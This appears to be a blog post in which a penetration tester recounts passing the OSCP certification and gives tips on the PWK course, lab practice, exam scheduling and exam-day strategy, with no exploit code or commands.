Whether you're about to embark on the OSCP journey, already started the PWK course, or waiting those nervous days before the exam, you’ve come to the right place. This post outlines my experiences passing the OSCP and aims to provide some tips that helped me along the way!
I have been a full time penetration tester for several years now, performing a variety of assessments against customer environments. I knew going into the OSCP web applications were not my strong suit (in comparison). Therefore, I decided to take the first few months of 2020 and complete eLearnSecurity’s eWPT certification. Feeling a bit more prepared, and with the confidence of a new cert under my belt, I was ready to tackle the OSCP!
PWK Course / Labs
1) Don't Forget About the PDF Guide & Course Videos
After receiving my PWK materials and lab access, I took the first few weeks to comb through the PDF guide. I started each night with one or two sections from the PDF then finish with some time in the lab. I purchased 90 days of lab access knowing there would be some obstacles in my personal life, preventing me from getting in as much time as I wanted with one of the lower options.
Although I did not submit a lab report, I did work through the exercises and documented my answers to each section. This ended up being very useful and was referenced several times while working on some of the lab machines.
2) Root as Many Lab Systems as You Can
It's no surprise the exam machines will somewhat resemble the techniques learned in the lab. It's in your best interest to get as much exposure as possible. If there's something you struggle with [i.e web apps, priv esc, etc] try to choose machines that highlight those techniques and PRACTICE! In total, I root'ed 21 systems and got access to all additional network segments. Many people set goals, such as: 20-30-40-50 systems. If you have the time and dedication, that is an excellent way to stay motivated a get the most out of the course!
Don't forget to save and document your actions, even if not submitting a lab report. You never know when you'll have to recall a technique or payload.
3) Don't Be Afraid to Ask for Help
Don't be afraid to ask for help in the Offensive Security forums or community resources. If someone helps you, pay it forward. Everyone is there for the same reason, to learn and get better!
This was a lesson I wish someone had told me early on. In my experience, everyone was very friendly and more than willing to help. Just be respectful of peoples' time and don't expect all the answers. When asking for help, detail some steps you have already taken and specific questions where people can provide a nudge.
4) Set Your Exam Date Early & Choose a Time That's Right for You
With about 30 days of lab access left, I scheduled my exam. I opted to take it a week after my lab ended to ensure everything I learned was still fresh. During that week, I read multiple reviews and blog posts, studied the PDF guide, and watched the provided video trainings. Another small task that helped immensely, was collecting additional tools and resources for potential situations I could encounter and organizing my browser bookmarks to streamline the research process during the exam.
Knowing I'm a morning person, I was sure to schedule a morning start time - factoring in potential meals, naps, and other breaks throughout the day. I ended up taking shorter breaks than expected, only getting 1 hour of sleep in 24 hours, but having an idea of this going into it helped me stay relatively calm.
5) Go in With a Plan
From the second I got my exam connection packet, I was prepared. The buffer overflow system was my first target, which was exploited while running Tib3rius's AutoRecon
in the background on the remaining scope. The exploit development section took me about 2 hours using a template I had created on the last day of my lab access. I found my prep-work allowed me to hit the ground running and not waste any time, which may have been needed on the back end.
6) Be Smart, Do Math
Before the exam, I read so many unfortunate posts about smart people falling just short of the required 70 points to pass. Not wanting to end up in the same position, I tried to exploit the exam systems in a way that would give me the most amount of points possible. It felt like I had a calculator running in my head at all times, playing out different scenarios to help determine which system to target next. Starting with the higher point systems, and only moving to the lower pointers where it made sense.
7) Stuck? Come Back to It
If you're anything like me, this piece of advice is easier said than done. I wanted to systematically run through each host, in the order I mapped out, knocking them out until I passed. This sounds great in theory but not always possible. Several times I found myself stuck, spending far too much time on one machine. Instead of looking at the clock and having a mini panic attack, I went to the next system in line. Only after I was done or at an acceptable number of points, did I come back and try again.
There is a reason the OSCP is considered a standard for most jobs in the offensive security space. Although difficult, it is achievable. Just breathe, keep learning, and don't give up - or as they say "Try harder"!
- Privilege Escalation: